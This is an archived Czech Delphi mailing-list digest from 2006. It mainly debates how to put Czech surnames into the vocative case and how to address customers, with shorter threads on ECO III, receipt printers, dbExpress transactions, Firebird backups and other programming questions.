Prevod prijmeni do 5. padu

[*] Petr Berek <sojokl(zv)seznam(tec)cz> - 04.5.2006 21:59:54

Tak na to koukam, se mi nejak rozjelo kodovani :-)
Tak jeste jednou, snad to ted prijde v pohode.

Ahoj,
osobne jsem tohle nikdy nepotreboval, ale porad nad tim premyslim. Chtelo by
to prijit na nejake pravidlo.
Ja si myslim, ze prijmeni koncici na "k" se daji do pateho padu pridani "u".
Pak myslim, ze prijmeni, ktere je zakonceno tvrdou souhlaskou (h,k,r, d t,
....) tak tam se prida e. Prijmeni koncici na a se zmeni a na o.
Ted jeste tak premyslim, tak u prijmeni koncici na l je taky e. Pak treba
koncici na c se prida i.
Nenapada me vic veci, ale urcite to chce nejake pravidlo a rozcasovat (case)
to.
Petr

On 5/4/06, Pavel Lavicka <konference(zv)zus(tec)cz> wrote:

> Ahoj vsichni,
> resil jste nekdo funkci, ktera by umela pravedat prijmeni do 5. padu
> podle pravidel ceske gramatiky. Momentalne mne nenapada jak na to, nebot
> cestina nabdizi v zavislati na tavru jmena nekolik variant (Novak -
> Novaku, Zeman - Zemane, Jehlicka - Jehlicko...).
>
> Predem de(kuji za pomoc
>
> Pavel

Prevod prijmeni do 5. padu

[*] Petr Berek <sojokl(zv)seznam(tec)cz> - 04.5.2006 21:55:53

Ahoj,
osobn+ARs- jsem tohle nikdy nepot+AVk-eboval, ale po+AVkA4Q-d nad t+AO0-m p+AVk-em+AP0BYQ-l+AO0-m. Cht+ARs-lo by
to p+AVk-ij+AO0-t na n+ARs-jak+AOk- pravidlo.
J+AOE- si mysl+AO0-m, +AX4-e p+AVkA7Q-jmen+AO0- kon+AQ0A7Q-c+AO0- na "k" se daj+AO0- do p+AOE-t+AOk-ho p+AOE-du p+AVk-id+AOE-n+AO0- "u".
Pak mysl+AO0-m, +AX4-e p+AVkA7Q-jmen+AO0-, kter+AOk- je zakon+AQ0-eno tvrdou souhl+AOE-skou (h,k,r, d t,
....) tak tam se p+AVk-id+AOE- e. P+AVkA7Q-jmen+AO0- kon+AQ0A7Q-c+AO0- na a se zm+ARs-n+AO0- a na o.
Te+AQ8- je+AWE-t+ARs- tak p+AVk-em+AP0BYQ-l+AO0-m, tak u p+AVkA7Q-jmen+AO0- kon+AQ0A7Q-c+AO0- na l je taky e. Pak t+AVk-eba
kon+AQ0A7Q-ci na c se p+AVk-id+AOE- i.
Nenapad+AOE- m+ARs- v+AO0-c v+ARs-c+AO0-, ale ur+AQ0-it+ARs- to chce n+ARs-jak+AOk- pravidlo a rozcasovat (case)
> [...]

> cestina nabdizi v zavislati na tavru jmena nekolik variant (Novak -
> Novaku, Zeman - Zemane, Jehlicka - Jehlicko...).

Prevod prijmeni do 5. padu

[*] Pavel Lavicka <konference(zv)zus(tec)cz> - 04.5.2006 21:29:52

[...]

ECO III

[*] Zbysek Hlinka <konference(zv)hlinka(tec)cz> - 04.5.2006 19:45:44

Ovsem pozor na to (a to jsem tam take rikal), plne objektove prekryti dat se
nehodi pro vsechno. Tam, kde je pozadovan velky vykon nad velkym objemem dat
jsou podobne technologie zpravidla nevhodne. Na aplikace s malym objemem dat
zase muze (ale nemusi!) byt takova technologie zbytecne draha. Takze jak
100hoven? Pred volbou podobne technologie je nutno se seznamit, jak se chova
k datum pri ocekavane provozni zatezi a co to udela proti navrhu primo nad
databazi vyladeneho na vykon.

Na druhe strane: dobre navrzena databaze v objektove-relacnim modelu muze
byt lepsi nez blbe navrzena databaze v ciste relacnim modelu. ;)

vhodna pokladni tiskarna

[*] Petr Zahradnik <clexpert(zv)clexpert(tec)cz> - 04.5.2006 18:31:39

Puvodni zprava ze dne 4.5.2006:

> potrebuji radu: klient pouzival starou (cca 8 let) pokladni tiskarnu,
> kde se tisklo primo na port. Po prechodu na W2k vznikl problem, pri
> tisku *nekdy* vypadl znak, kdyz to byla cislice v castce, bylo to
> Chci klienta presvedcit ke koupi nove jehlickove tiskarny. Tak do 10
> kKc, musi mit vlastni ovladac pro tisk pres tiskovou frontu Windows a
> hlavne kvalitne a citelne tisknout. Termalni se asi nehodi, protoze tisk
> se za rok ztrati? Prosim o doporuceni vhodne tiskarny.

1. Na jehlickove pokladni tiskarny se tiskne ve znakovem rezimu a ne v
grafickem, to je preci bejkarna na to tisknout graficky.

2. Zjisti si nejdrive, jestli nahodou ten klient nebude potrebovat
fiskalni tiskarnu, abys mu nedodaval normalni a on to nechtel na
prijimani penez v obchode...

3. Termalni tisk se za rok neztrati, kdyz pouzivas kvalitni papir, mas
kvalitni tiskarnu, a s uctenkou pak nezachazis nedoporucovanym
zpusobem. Naopak, termalni tiskarna je pro provozovatele velmi vyhodna
z nekolika duvodu - nizsi provozni naklady, vyssi spolehlivost, vyssi
rychlost tisku, nizka hlucnost, moznost rychleho tisku grafiky, loga,
carovych kodu apod.

OT: vhodna pokladni tiskarna

[*] bleak vm <bleak(zv)mvesely(tec)com> - 04.5.2006 17:39:36

Zdravim vas,
potrebuji radu: klient pouzival starou (cca 8 let) pokladni tiskarnu,
kde se tisklo primo na port. Po prechodu na W2k vznikl problem, pri
tisku *nekdy* vypadl znak, kdyz to byla cislice v castce, bylo to
zavazne. Sehnal jsem k tiskarne ovladac a tiskarna nyni tiskne v
grafickem rezimu pres frontu Windows. Je to ale pomale a tiskarna tiskne
nektere radky vyssi a nektere nizsi, jakoby spatne posouvala papir.
Tiskne obousmerne, jednosmerny tisk se mi nepodarilo nastavit.
[...]

bleak

ECO III

[*] Petr Zahradnik <clexpert(zv)clexpert(tec)cz> - 04.5.2006 16:31:31

Puvodni zprava ze dne 4.5.2006:

> 2. zacinat dnes psat aplikaci v jine verzi frameworku nez .NET 2.0
> je naproste silenstvi

To se mi vzdycky libi tahle prohlaseni:

- zacinat projekt v delphi je silenstvi
- zacinat projekt v necem jinem nez .net je silenstvi
- dokonce uz zacinat v necem jinem nez .net 2.0 je silenstvi

Jdete s tim lidicky nekam :-) :-) :-)

ECO III

[*] kejval.delphi(zv)centrum(tec)cz - 04.5.2006 15:45:27

From: "Petr Vones" <konference(zv)petrvones.net>

> O ECO nic nevim, ale obecne bych k tomu mel dve poznamky:
>
> 1. zdrojaky od celeho frameworku sice nejsou, ale v nouzi si lze vcelku
> dobre pomoct Reflectorem (ma standardne i Delphi.NET syntaxi)
>
> 2. zacinat dnes psat aplikaci v jine verzi frameworku nez .NET 2.0 je
> naproste silenstvi

Zas takove silenstvi to neni. Eco v podstate nahrazuje relacni DB a case nastroje. K dotazu na data, zde objekty, se pouziva vyhradne jazyk OCL, nahrada za SQL, ktery neni vhodny pro objektovou prezentaci. Takze na psani aplikacni serveru me od frameworku odstinuje Eco a je mi pak celkem jedno pod kterym frameworkem to bezi. U SQL DB taky neresim, jestli je psana pod nejakym .Net. Navic model s aplikacni logikou mi zustava porad stejny, takze i pro pristi verze .Netu, pokud samozrejmne Borland nebo ted uz spis "DevCo", bude dal Eco vyvijet. Shrnuto na psani aplikacniho serveru je to pro urcity typ aplikaci vyborny prostredek, alespon podle meho nazoru. Jina situace je u klientu, kde uz me dana verze .Netu zajima. Samozrejmne, ze je daleko lepsi pouzit firemni provazanost mezi Ecem a klientem a kdyby bylo Delphi pro .Net 2.0, byla by situace daleko lepsi, ale porad je tu moznost, ze aplikacni server bude data prezentovat pomozi Datasetu a pak si muzes psat klienty v cem chces, ale umorna prace s vyrabenim SQL prikazu pomoci DBComman
d je pryc. Navic me nezajima, do ktereho uloziste dat budu ukladat, staci mit prislusneho providera a je to.. Dalsi plus je, ze Eco podle zmen v modelu synchronizuje i prislusne DB, takze zase o praci mene.. Nakonec Zbysek v Belohrade neukazoval nic jineho, jen pouzita vrstva nebyla Eco ale myslim DataObjects. Oproti Eco je tato technologie ale jeste v plenkach..

S pozdravem
ing. Richard Kejval
mobil: 602477679
http://www.icsoftware(tec)cz

Prevod prijmeni do 5. padu

[*] Dalibor Faltynek <dalibor.faltynek(zv)orgrez(tec)cz> - 05.5.2006 07:10:32

Neni to jenom vec koncovky: napriklad Faltynek - Faltynku, Flink - Flinku, v
prvnim pripade mizi taky e.
Dalik.

> [...]
> koncici na c se prida i.
> Nenapada me vic veci, ale urcite to chce nejake pravidlo a rozcasovat

Prevod prijmeni do 5. padu

[*] Petr Berek <sojokl(zv)seznam(tec)cz> - 05.5.2006 07:18:33

Tohle si nemyslim, spis je to o zvyku. Me prijmeni je Berek a nekteri me
oslovuji Bereku a nekteri Berku.
Petr

On 5/5/06, Dalibor Faltynek <dalibor.faltynek(zv)orgrez(tec)cz> wrote:

> Neni to jenom vec koncovky: napriklad Faltynek - Faltynku, Flink - Flinku,
> prvnim pripade mizi taky e.
> Dalik.

Prevod prijmeni do 5. padu

[*] petr palicka <palicka.petr(zv)seznam(tec)cz> - 05.5.2006 07:34:34

Ahoj,

Petr Berek napsal(a):
> Ahoj,
> osobn+ARs- jsem tohle nikdy nepot+AVk-eboval, ale po+AVkA4Q-d nad t+AO0-m p+AVk-em+AP0BYQ-l+AO0-m. Cht+ARs-lo by
> to p+AVk-ij+AO0-t na n+ARs-jak+AOk- pravidlo.

jedno z pravidel konference je, ze se prispevky pisi bez hacku a
carek. Tohle se opravdu neda poradne precist.

Prevod prijmeni do 5. padu

[*] Pavel Smerk <xsmerk(zv)fi.muni(tec)cz> - 05.5.2006 07:40:34

On Fri, May 05, 2006 at 07:18:33AM +0200, Petr Berek wrote:
> Tohle si nemyslim, spis je to o zvyku. Me prijmeni je Berek a nekteri me
> oslovuji Bereku a nekteri Berku.

A prave toho bych se obaval. Ze budou dve moznosti, clovek pouzije jednu,
zakaznik bude preferovat druhou a prvni v nem vzbudi nelibe pocity, ze je
komoleno jeho jmeno. Neni lepsi se tomu osloveni vyhnout?

S pozdravem, P.

Prevod prijmeni do 5. padu

[*] Jitka Pizurova - NWT Computer s.r.o. <jitka.pizurova(zv)nwt(tec)cz> - 05.5.2006 07:48:35

Zdravim.

A co pouzit klasiku:

pane Berek
pane Faltynek
pane Vomacka

A odpada vam veskera starost o koncovky.

Pokud nezmenite ani pismenko v prijmeni, tak by se nemelo nic stat, protoze
se ten clovek tak skutecne jmenuje. Myslim, ze ani cestinar by proti tomu
nemel nic mit.

Jitka

> [...]
> zakaznik bude preferovat druhou a prvni v nem vzbudi nelibe pocity, ze je
> komoleno jeho jmeno. Neni lepsi se tomu osloveni vyhnout?

[*] Pavel Smerk <xsmerk(zv)fi.muni(tec)cz> - 05.5.2006 08:06:37

On Fri, May 05, 2006 at 07:48:35AM +0200, Jitka Pizurova - NWT Computer s.r.o. wrote:
> [...]
> se ten clovek tak skutecne jmenuje. Myslim, ze ani cestinar by proti tomu

No, mnozi lide maji za to, ze k osloveni slouzi paty pad a oslovovat prvnim
je zhovadile. Ja bych proste neoslovoval, to je nejjistejsi.

(Ostatne, pokud puvodni tazatel nevi, jak oslovovat sve zakazniky, a nemuze
to tedy realizovat vyctem, tak s nimi asi nema prilis osobni vztah a v
takovem pripade bych tim spis neoslovoval, protoze to vypada neprirozene.
Alespon na me to tak vzdycky pusobi, kdyz mi rekneme banka posle nejaky
produktovy letak "Pane Smerku" [v horsim pripade "Pane Smerk"], rikam si, co
je to za falesnou snahu o blizkost, kdyz se s podepsanym reditelem vubec
neznam --- a ten by o to navic ve skutecnosti jiste ani trochu nestal.)

> ----- Original Message ----- From: "Pavel Smerk" <xsmerk(zv)fi.muni(tec)cz>

Sluzby

[*] koukal(zv)petrkoukal(tec)cz - 05.5.2006 08:14:38

>Dobry den,
>potreboval bych vytvort v Delphi program ktery funguje jako sluzba (service), nemohl byste mi nekdo poradit s timto problemem? >Nejlepsi by bylo reseni kompatibilni s Delphi 4.

>Ivo Macenauer

Dobry den ,

vse je zapouzdreno do tridy TService (sluzby) a Thread (vlakna) . Pokud D4 je shopana chodu na Wi NT technology a tyto tridy ma implementovany (to uz si nepamatuji) tak by to melo fungovat.

Jinak API funkce viz MSDN

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnanchor/html/dllprocessthreads.asp

Pokud jde o hotovy program existuje spousta utilit na prevod programu na Sluzbu (viz adchiv konference - na toto tema sla nekolikrat diskuze).

Petr Koukal.

.

Prevod prijmeni do 5. padu

[*] petr palicka <palicka.petr(zv)seznam(tec)cz> - 05.5.2006 08:10:37

Ahoj,

Jitka Pizurova - NWT Computer s.r.o. napsal(a):
> Zdravim.
>
> A co pouzit klasiku:
>
> pane Berek
> pane Faltynek
> pane Vomacka

to neni klasika, to je hovorove, az neuctive. Taky jsem si myslival,
ze je to jedno, ale dneska bych takto uz zakaznika neoslovil.

> Myslim, ze ani cestinar by proti tomu nemel nic mit.

No, tak cestinare bych timto rozhodne neprovokoval :-)

> Jitka

Peca

Prevod prijmeni do 5. padu

[*] Petr Malasek <malasek(zv)carsoft(tec)cz> - 05.5.2006 08:50:40

Existuje na to knihovna Deklinator - http://www.deklinator(tec)cz/
Je to DLL a maji to vychytane. Ale neni nejlevnejsi.

PeM

Prevod prijmeni do 5. padu

[*] Jan Dvorak <dvorak(zv)szu(tec)cz> - 05.5.2006 08:10:37

Doporucuji obratit se ma Ustav pro jazyk cesky. Tam to maji perfektne
zpracovane a jsou (pred mnoha lety alespon byli) ochotni poskytnout
konzultace.
Jan Dvorak

Prevod prijmeni do 5. padu

[*] Dalibor Faltynek <dalibor.faltynek(zv)orgrez(tec)cz> - 05.5.2006 08:48:40

Ahoj,
no ja nevim, urcite to cestinarsky neni uplne podle pravidel, ale me osobne
se pri osloveni patym padem jmena vzdycky jezi vlasy, kdyz si vzpomenu, ze
na me patym padem rvali na vojne..
A navic mi to stejne zni divne az komisne. Ale to uz je debata, ktera se asi
netyka programovani.
Dalik.> to neni klasika, to je hovorove, az neuctive. Taky jsem si myslival,
> ze je to jedno, ale dneska bych takto uz zakaznika neoslovil.

Prevod prijmeni do 5. padu

[*] Lukas Barton <lukas(zv)cnawr(tec)cz> - 05.5.2006 09:02:41

Dalibor Faltynek wrote:

> [...]
>na me patym padem rvali na vojne..
>A navic mi to stejne zni divne az komisne. Ale to uz je debata, ktera se asi

Trochu je o tom napsano na http://www.ujc.cas(tec)cz/poradna/odpo.html#paty
(a nejen o tom oslovovani).

Prevod prijmeni do 5. padu

[*] Miroslav Suchy <suchy(zv)jplusj(tec)cz> - 05.5.2006 09:20:43

Pokud jde o hledisko cestinarske, je osloveni v 1.pade jednoznacne chybne.
Je to germanismus jako noha. Proste Herr Dvorak se prevedlo jako pane
Dvorak.
Nesmyslnost tohoto tvaru krasne vynikne, kdyz misto osloveni "pan" pouzijete
jine,
napriklad sokolsky "bratr" nebo drive oblibeny "soudruh". Osloveni "Bratre
Dvorak"
by jiste nikdo nepouzil a pokud ano, mel by byt zastrelen za usvitu.

Wabi

> [...]
> protoze
> se ten clovek tak skutecne jmenuje. Myslim, ze ani cestinar by proti tomu

[*] Jitka Pizurova - NWT Computer s.r.o. <jitka.pizurova(zv)nwt(tec)cz> - 05.5.2006 09:44:45

panove,

fajn, pokonila jsem to...., ale misto abych si sypala popel na hlavu,
podivala jsem se, co rika Jazykova poradna UJC AV CR:
http://www.ujc.cas(tec)cz/poradna/porfaq.htm

Jelikoz se mi to nechce prepisovat to sem - muselo by to byt bez diakritiky,
tak tady je odkaz:
http://www.ujc.cas(tec)cz/poradna/odpo.html#paty

Jitka

Prevod prijmeni do 5. padu

[*] Jozef Uhler <uhler(zv)os.sk> - 05.5.2006 09:42:44

DD,

ako tak citam Vasu debatu, som celkom rad, ze v slovencine 1.pad =
5.pad. Vzdy som sa na zakladne skole divil, preco existuje 5.pad, kde nie
je potrebny, ale bolo to asi dane nasou spolocnou repulikou. Ved preco by
mala jedna republika mat 7 padov a ta druha len 6. U nas sa to aspon lahsie
programuje. Ale mate pravdu, ze ak ma niekde byt oslovenie, tak MUSI byt
spravne (alebo ziadne).

Jozo;

At 09:20 5. 5. 2006 +0200, you wrote:
> [...]
>Dvorak"
>by jiste nikdo nepouzil a pokud ano, mel by byt zastrelen za usvitu.

[*] Pavel Smerk <xsmerk(zv)fi.muni(tec)cz> - 05.5.2006 09:56:46

On Fri, May 05, 2006 at 09:50:45AM +0200, Petr Zahradnik wrote:
> Puvodni zprava ze dne 5.5.2006:

> Kdyby napsal "Pavle", bylo by to mozna neobvykle, ale kdyz napise
> "Vazeny pane Smerku", je to zcela v poradku. Co jineho by mel napsat,
> kdyz Te chce oslovit? Je to to nejlepsi, co muze udelat.

Co by bylo neobvykleho na Vazeny pane? (A stejne bude mit problem s panimi a
slecnami. :) Osobne bych dokonce mozna v nekterych pripadech (napr. mail)
tihl k Dobry den, ale uznavam, ze to asi neni vhodne vzdy.
P.

Prevod prijmeni do 5. padu

[*] Petr Zahradnik <clexpert(zv)clexpert(tec)cz> - 05.5.2006 09:50:45

> [...]

"Vazeny pane Smerku", je to zcela v poradku. Co jineho by mel napsat,
kdyz Te chce oslovit? Je to to nejlepsi, co muze udelat.

[*] Petr Zahradnik <clexpert(zv)clexpert(tec)cz> - 05.5.2006 09:48:45

Puvodni zprava ze dne 5.5.2006:

> A co pouzit klasiku:

> pane Berek
> pane Faltynek
> pane Vomacka

To neni klasika, to je spatne a hrozne a znamena to, ze dotycny neumi
cesky.

> Pokud nezmenite ani pismenko v prijmeni, tak by se nemelo nic stat,
> protoze se ten clovek tak skutecne jmenuje. Myslim, ze ani cestinar
> by proti tomu nemel nic mit.

To jiste :-) Pokud dotycny cestinar chybel ve skole na paty pad, tak
proti tomu nebude nic mit :-) Asi takhle:

Jitka, co dnes delas? Jitka, jak se mas? Jitka, kolik je hodin? Jitka,
pojd sem. Jitka, kup nam neco k veceri. Jitka, jak se Ti to libi? :-)

Prevod prijmeni do 5. padu

[*] Tomas Rosa <trosa(zv)seznam(tec)cz> - 05.5.2006 10:18:48

> Co by bylo neobvykleho na Vazeny pane? (A stejne bude mit problem s panimi a
> slecnami. :)

Vsechny zeny oslovujeme "pani", bez ohledu na to, jsou-li vdane, ci nikoliv.

http://www.ceskatelevize(tec)cz/program/203522165250006.html?&tema=detail

Prevod prijmeni do 5. padu

[*] Skalsky Milan <skalsky(zv)komercpoj(tec)cz> - 05.5.2006 10:32:49

Pri komunikaci se zakaznikem pouzivame osloveni "Vazeny pane"/ "Vazena pani" ... zjistit pohlavi neni problem ...
Pri tomto osloveni se vyhnete napriklad tomu, ze budete nekde ohybat prijmeni podle pravidel, ktera se cas od casu meni ... a s pribyvajicim vlivem anglictiny a nemciny se pravdepodobne i nadale menit budou.
Jako jedno z reseni (nerikam, ze je to vselek, ale je to funkcni) se jevi napriklad v tabulce uzivatelu skladovat nejen polozku JMENO, PRIJMENI, ale take treba OSLOVENI ... samozrejme uz je to naklad na manualni praci ... ale usetri to spoustu faux pas, kdy pripadny klient otevre korespondenci a padne do mdlob.

ad poznamka od Petra Z. (pani/slecna): podle etikety je vhodne kazdou zenu nad 15 let oslovovat "pani" ... at uz s privlastkem mlada nebo bez nej (muzete pouzit i stara, ale v tom pripade je snad prijatelnejsi fakt pouzit radeji spatny tvar prijmeni nez osloveni stara pani :)) ). Ale kdyz bude ta zenska chtit, taxe muze citit urazena kdykoli ... at uz v pripade, ze nekdo nepouzil MLADA, nebo naopak pouzil (bude to citit jako ironii) atp. atp.

Osobne bych videl vyhodu v neosobnim Vazeny pane, Vazena pani ... jednak je to pro vsechny stejne, tudiz nikdo by se nemel citit diskriminovany (jak uzasne zneuzivane slovo v dnesni dobe), navic nikdo by nemel mit pocit, ze se dana spolecnost umele snazi navodit nejaky pocit "blizsiho vztahu", jak uz tu nekdo psal.

> [...]
> Puvodni zprava ze dne 5.5.2006:

Co by bylo neobvykleho na Vazeny pane? (A stejne bude mit problem s panimi a

[*] Petr Zahradnik <clexpert(zv)clexpert(tec)cz> - 05.5.2006 10:10:47

> [...]

> panimi a slecnami. :) Osobne bych dokonce mozna v nekterych
> pripadech (napr. mail) tihl k Dobry den, ale uznavam, ze to asi neni

Z psychologickeho (a potazmo marketingoveho hlediska) je prokazano, ze
kazdy rad slysi (cte) sve jmeno. Kdyz nebudes oslovovat jmenem (v
dopise, v telefonu), jednoduse prodas mene, nez bys prodat mohl :-)

Vypnuti monitoru v XP

[*] Venca Zaruba <zaruba(zv)elastoform(tec)cz> - 05.5.2006 10:10:47

HI,
Jakym zpusobem vypnu minitor v xp?

PS:
Vim, ze toto:
SendMessageApplication.Handle,wm_SysCommand,SC_MonitorPower,0);
Fungi jen v W98

Prijemny zbytek dne
Vasek Zaruba
8^)

Prevod prijmeni do 5. padu

[*] Petr Zahradnik <clexpert(zv)clexpert(tec)cz> - 05.5.2006 11:12:52

Puvodni zprava ze dne 5.5.2006:

> ad poznamka od Petra Z. (pani/slecna):

Ja jsem o pani/slecne vubec nic nepsal :-)

Prevod prijmeni do 5. padu

[*] Ludek <konference(zv)sales(tec)cz> - 05.5.2006 13:00:59

> Osobne bych videl vyhodu v neosobnim Vazeny pane, Vazena pani ... jednak je to pro vsechny stejne, tudiz nikdo by se nemel citit diskriminovany (jak uzasne zneuzivane slovo v dnesni dobe), navic nikdo by nemel mit pocit, ze se dana spolecnost umele snazi navodit nejaky pocit "blizsiho vztahu", jak uz tu nekdo psal.

> [...]

Zdravim,
I ja se k teto variante priklanim..Marketingovy dopis/mail mi s nadpisem "Vazeny pane" prijde prijemnejsi a mam mene chuti ho bez precteni hodit do kose nez pokud jsem tam osloven jmenem. Nevim proc, ale je to tak....

Ludek

Prevod prijmeni do 5. padu

[*] Pavel Smerk <xsmerk(zv)fi.muni(tec)cz> - 05.5.2006 13:13:00

On Fri, May 05, 2006 at 10:10:47AM +0200, Petr Zahradnik wrote:
> Puvodni zprava ze dne 5.5.2006:

versus

> Z psychologickeho (a potazmo marketingoveho hlediska) je prokazano, ze
> kazdy rad slysi (cte) sve jmeno. Kdyz nebudes oslovovat jmenem (v
> dopise, v telefonu), jednoduse prodas mene, nez bys prodat mohl :-)

Jsem rad, ze se ozyvaji i dalsi --- ja bych si obecnou platnosti teto poucky
nebyl tak uplne jisty. Verim, ze kdyz babce na dedine prijde dopis Vazena
pani Vomackova, muze to mit kladny efekt. Cili pro takove ty direkt
marketingove spolecnosti to asi bude uzitecne pravidlo. Jestli to ale lze
pouzit i pro klientelu, kterou lze predpokladat u ucastniku teto konference,
to uz bych si nebyl uplne jisty. Spis bych si myslel, ze se vic lidi
pozastavi nad svym jmenem "o co se proboha snazi?", nez kolik zakazniku to
zahreje u srdicka.
P.

Prevod prijmeni do 5. padu

[*] Petr Zahradnik <clexpert(zv)clexpert(tec)cz> - 05.5.2006 13:43:02

Puvodni zprava ze dne 5.5.2006:

> Jsem rad, ze se ozyvaji i dalsi
> Spis bych si myslel, ze se vic lidi pozastavi nad svym jmenem "o co
> se proboha snazi?", nez kolik zakazniku to zahreje u srdicka. P.

No koukam, Pavle, ze Tebe zahralo u srdicka to, ze jeden nebo dva lidi
z teto konference maji stejny nazor jako mas Ty. A podle toho uz
soudis, ze vsichni ucastnici konference nemaji radi sve jmeno v
osloveni, a daji prednost suchemu "vazeny pane". No tak hlavne ze jsme
vsichni happy a ted zpatky k tematu - jinymi slovy, zanechme techto
debat, ktere s Delphi uz nemaji nic spolecneho. Pokud nekdo mate neco
konkretniho k 5. padu a Delphi, pokracujte v konkretni technicke
debate, ve vseobecne rovine uz prosim dale nediskutujte.

Dekuji,

Nastavenie max zataze procesoru aplikacie

[*] vlko <vlko(zv)zilina(tec)net> - 05.5.2006 13:49:03

Akurat sa hram s Virtual Server 2005 RC2 a vidim tam
zaujimavu featuru. A to nastavenie maximalneho vytazenia
procesora. Tiez je tam mozne definovat percentualne mnoztvo
ktore si ma pre seba od procesoru rezervovat.

Moja otazka je: Je toto mozno vykonat programovo? Alebo to
musi mat uz aplikacia implementovane v sebe?

vlko

PS: budem vdacny za kazdu linku:)

mail: vlko(zv)zilina.net
web: http://vlko.zilina.net

Indy knihovna a stahovani obrazku z http serveru

[*] Pavel P <pavel(zv)tvsp(tec)net> - 05.5.2006 15:37:11

Dobry den vsem,
mate nekdo zkusenost jak za pomoci indy knihovny, nebo i jinak stahnout z daneho url obrazek a treba ho ulozit do souboru, nebo streamu?
Dekuju za help, Pavel P.

Exception: noActiveTransaction pri spusteni transa

[*] mydelphiconf(zv)centrum(tec)cz - 05.5.2006 15:35:10

Ahoj lidi,
pri update DB se mi obcas stava, ze mi nize uvedeny kod vychcipe pri startu transakce na exception: "there is no active transaction" ... nekdy to projde, nekdy ne ... netusim, z jakeho duvodu.

var
uTrans:TTransactionDesc;
DBsys:TSQLConnection
... a v momente startu transakce je DBSys vzdy pripojena (otestovano)

SQLCommand je update nad tabulkou, nad kterou ma pripojeny uzivatel prava select, delete, update

try
uTrans.TransactionID:= getTransID;
uTrans.IsolationLevel := xilREADCOMMITTED;
DBsys.StartTransaction(uTrans);
DBsys.ExecuteDirect(sqlCommand);
DBsys.Commit(uTrans);
except
on E:Exception do begin
DBsys.Rollback(uTrans);

funkce getTransID vraci vzdy inkrement globalniho counteru.

netusite, z jakeho duvodu to muze chcipat? (padne to cca z 50-60% pripadu :( )

P.
D7, WinXP
zacatecnik-amater

Indy knihovna a stahovani obrazku z http serveru

[*] Lukas Gebauer <gebylist(zv)mlp(tec)cz> - 05.5.2006 15:57:12

> mate nekdo zkusenost jak za pomoci indy knihovny, nebo i jinak
> stahnout z daneho url obrazek a treba ho ulozit do souboru, nebo
> streamu? Dekuju za help, Pavel P.

Synapse, unita httpsend.pas, funkce:

function HttpGetBinary(const URL: string; const Response: TStream):
Boolean;

Exception: noActiveTransaction pri spusteni transa

[*] Ladislav Stary <stary(zv)ekodat(tec)cz> - 05.5.2006 18:11:21

Hm, technologie DBExpress. A spravny ovladac pro databazi mas? Co je to
vubec za databazi?

Ladislav Stary

mydelphiconf(zv)centrum(tec)cz napsal(a):

> [...]
>
>funkce getTransID vraci vzdy inkrement globalniho counteru.

IB/FB - gfix mend neodstranilo chybu (WAS: interna

[*] Jiri Cincura <diskuze(zv)cincura(tec)net> - 08.5.2006 10:09:56

On 4.5.2006 7:32 Karel Rys wrote:
> doporucoval bych zalozit databazi se stejnou strukturou (mas-li skript, jde to snadno, jinak
> gbak/restore s nejakymi parametry myslim taky umi zalohovat/obnovit jen metadata).

isql DBalias -o ddl.sql -x -u SYSDBA -p masterkey

> Potom bych pouzil program IbPump (najit na webu), ktery umi kopirovat radek po radku a chybne
> preskoci - vypise, kde a kolik chyb nasel (stalo se mi kdysi nejak, ze se v tabulce objevily dve
> vety se stejnym primarnim indexem - a to jsem k sys. tabulkam nikdy primo nepristupoval).

mozna by stacilo rici gbaku -n -o -v , sam to umi a vidim co se deje ... ;)

> Take se nam nekde stalo, ze neprobehla cela zaloha (vypsalo to ale pri zalohovani chybovou hlasku)
> - pak to pri obnove psalo totez, co tobe. Tehda pomohl bud vyse uvedeny postup, nebo pri tvorbe
> zalohy nejakym parametrem nastavit, aby se zaroven NEprovadela garbage collection.

gbak -g

http://www.cincura.net/

ECO III

[*] kejval.delphi(zv)centrum(tec)cz - 09.5.2006 10:09:35

From: "Zbysek Hlinka" <konference(zv)hlinka(tec)cz>
> [...]
> zase muze (ale nemusi!) byt takova technologie zbytecne draha. Takze jak

V prvni rade bych nesrovnaval DataObjects s Eco, protoze to je jak srovnavat trabanta s mercedesem. Eco implementuje standardizovany jazyk OCL(object constraint language), specifikovany OML v 1999, ktery je prave urcen k optimalnim dotazum na objektove struktury. O vikendu jsem se na to podival podrobneji a musim rict, ze vsechny moznosti, ktere clovek mel pri dotazovani na relacni databazi pomoci SQL jsou plne podporovany, vcetne dynamicky sestavovanych dotazu, za behu programu. Takze nacist napr, prvnich 100 zaznamu z milionove tabulky srovnane podle daneho krtiteria, neni zadny problem. Dalsi problem jsem videl v tom, ze objekty, ktere jsou dedene, se do DB ukladaji tak, ze vzdy plni tabulku predka a do tabulky potomka, pridavaji jen udaje, o ktere se lisi predek s potomkem, coz z hlediska optimalizace nemusi byt vzdy vhodne. Pro tento pripad se ale v Eco da pouzit abstraktni trida predka a potomci se pak ukladaji tak, jak byl clovek zvykly v relacnim modelu, takze opet zadny problem. Navic vsechna komunikace v SQL mezi Eco a D
B se da monitorovat, takze optimalizovani indexu, opet zadny problem. Posledni uskali by mohlo byt jen v tom, ze se v Eco nedaji pouzivat ulozne procedury. Misto toho se objekty (data) budou zpracovavat az na urovni Eco => muze vzniknout rozdil mezi rychlosti prislusne DB a aplikacniho serveru, ktery bezi pod .Net. Tento rozdil zatim neumim posoudit, ale chystam se na nejake testy pro vetsi data, takze az budu neco mit, muzu dat vedet. I kdyz na zacatku jsem mel take pochybnosti, ze to pro velke aplikace nemuze fungovat, tak ted uz se zacinam priklanet k nazoru, ze vyhody Eco se projevi plne az u slozitejsich a datove obsahlych aplikaci, kdy se vyplati i ta pomerne vyskoka investice do Eco :-(

S pozdravem
ing. Richard Kejval
mobil: 602477679
http://www.icsoftware(tec)cz

Zedgraph - ukoncenii aplikace

Ahoj, rozhodl jsem se pouzit komponenty na zobrazeni grafu - zedgraph.
Bohuzel, kdyz zahrnu do sve aplikace formular s timto grafem, tak pri vyvolani, se mi aplikace ukonci.
Pokud tento graf dam do noveho projektu, tak je vsechno OK.

Nevite nekdo kde by mohla byt chyba?

Dojde to do Unity Fill.cs radek 189 - Init()

public Fill( Color color, Brush brush, FillType type )

{

Init(); ////// TADY se cela aplikace ukonci bez nejakeho hlaseni, do toho INITU to ani nevleze.

this.color = color;

this.brush = brush;

this.type = type;

}
Verze zedgraph_source_4.3.5 a Visual studio .Net 2005

D.

Adonis - "Z ulozene procedury se nevraci do aplika

[*] Letal Integrodat <letal(zv)integrodat(tec)cz> - 09.5.2006 11:05:39

zdravim,

pro spusteni ulozenych procedur pouzivam objekt TADOStoredProc
mam Adonis ver. 4.4
